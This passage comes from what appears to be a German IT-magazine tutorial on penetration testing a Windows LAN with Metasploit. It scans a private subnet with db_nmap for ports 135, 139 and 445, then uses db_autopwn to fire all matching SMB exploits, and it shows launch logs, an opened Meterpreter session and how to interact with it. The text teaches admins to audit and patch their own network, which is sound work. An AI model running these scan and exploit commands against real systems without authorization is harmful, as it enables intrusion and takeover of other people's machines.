Ein wirklich offenes Windows-LAN

Besondere Aufmerksamkeit verdient der Befehl »db_nmap«: Er startet einen Nmap-Scan und füllt die Tabellen mit den gefundenen Ergebnissen. Die »db_import«-Befehle kommen später zum Einsatz. Schnelle Erfolgserlebnisse liefern typische Microsoft-Clients mit deaktivierter Firewall. Dort stehen jedem Angreifer die leicht verwundbaren TCP-Ports 135, 139 oder 445 zur freien Verfügung. Mit »db_nmap -p 135,139,445 192.168.0.0/24« scannt Nmap das gesamte Class-C-Netzwerk auf die zuvor genannten Ports. Er- folgreiche Tabelleneinträge in der Datenbank zeigen die Befehle »db_hosts« und »db_services«(Tabelle 1).

Tabelle 1: »db-services«

In »db_hosts« finden sich - je nach Scanparameter - IP, MAC-Adresse und Zeitstempel für jeden gefundenen Host, während »db_services« sogar offene und geschlossene Ports auf den erfassten Systemen enthält. Hat Metasploit offene Ports gefunden, kann der Pentester sie direkt mit dem Modul Autopwn aufrufen. Ohne Parameter gibt »db_autopwn« eine Liste seiner Optionen aus (Listing 3).

#> db_autopwn
[*] Usage: db_autopwn [options]
-h Display this help text
-t Show all matching exploit modules
-x Select modules based on vulnerability references
-p Select modules based on open ports
-e Launch exploits against all matched targets
-r Use a reverse connect shell
-b Use a bind shell on a random port (default)
-q Disable exploit module output
-R [rank] Only run modules with a minimal rank
-I [range] Only exploit hosts inside this range
-X [range] Always exclude hosts inside this range
-PI [range] Only exploit hosts with these ports open
-PX [range] Always exclude hosts with these ports open
-m [regex] Only run modules whose name matches the regex

Pandora

Lässt der Admin »db_autopwn -t -p -e« los, dann wendet Metasploit alle vorhandenen Exploits auf jeden offenen Port an, der in »db_services« eingetragen ist. Auf ungepatchten Windows-Systemen kommt es dabei durchaus vor, dass die Tools ein System ganz nebenbei mehrfach übernehmen. Verständlich ist auch, dass dieser Vorgang je nach Anzahl der Einträge einige Zeit in Anspruch nehmen kann. Jede geglückte Übernahme zeigt Metasploit bereits während des Scanvorgangs an (Listing 4).

16/39 [0 sessions]): Launching exploit/windows/smb/msdns_zonename against 192.168.1.14:139...
[*] (17/39 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwapi against 192.168.1.14:445...
[*] (18/39 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 192.168.1.14:445...
[*] (19/39 [0 sessions]): Launching exploit/solaris/samba/trans2open against 192.168.1.14:139...
[*] (20/39 [0 sessions]): Launching exploit/windows/smb/ms04_031_netdde against 192.168.1.14:139...
[*] Meterpreter session 1 opened (192.168.1.2:46068 > 192.168.1.14:10140)

Nach dem Durchlauf liefert der Sessions-Befehl Auskunft über alle erfolgreichen Verbindungen. Abbildung 1 zeigt fünf Connections auf zwei verschiedene PCs. Die erste Verbindung übernimmt »sessi- ons -i 1« und startet dort:

msf > sessions -i 1
[*] Starting interaction with 1...
meterpreter >

Eine Besonderheit bei dieser Übernahme ist der Einsatz der Shell namens Meterpreter. Wer die Leistungsfähigkeit der Microsoft-Kommandozeile mit der eines Linux-Systems vergleicht, entwickelt schnell den Wunsch nach einer besseren Umgebung. Die Open-Source-Programmierer von Metasploit haben diesem Wunsch Rechnung getragen: In der Shell liefert der Befehl »help« eine lange Liste aller vorhandenen Befehle.

Abbildung 1: Zwei lokale Windows-Systeme haben sich als mehrfach verwundbar erwiesen - höchste Zeit für ein paar Software-Updates.